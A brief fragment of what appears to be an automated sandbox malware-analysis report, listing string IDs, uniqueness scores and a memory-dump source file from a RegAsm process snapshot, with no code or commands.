• API ID:
• String ID: (_^q$(_^q$$^q$$^q$$^q
• API String ID: 0-142850551
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
Similarity
• API ID:
• String ID: (_^q$(_^q$$^q$$^q$$^q
• API String ID: 0-142850551
Uniqueness
Uniqueness Score: -1.00%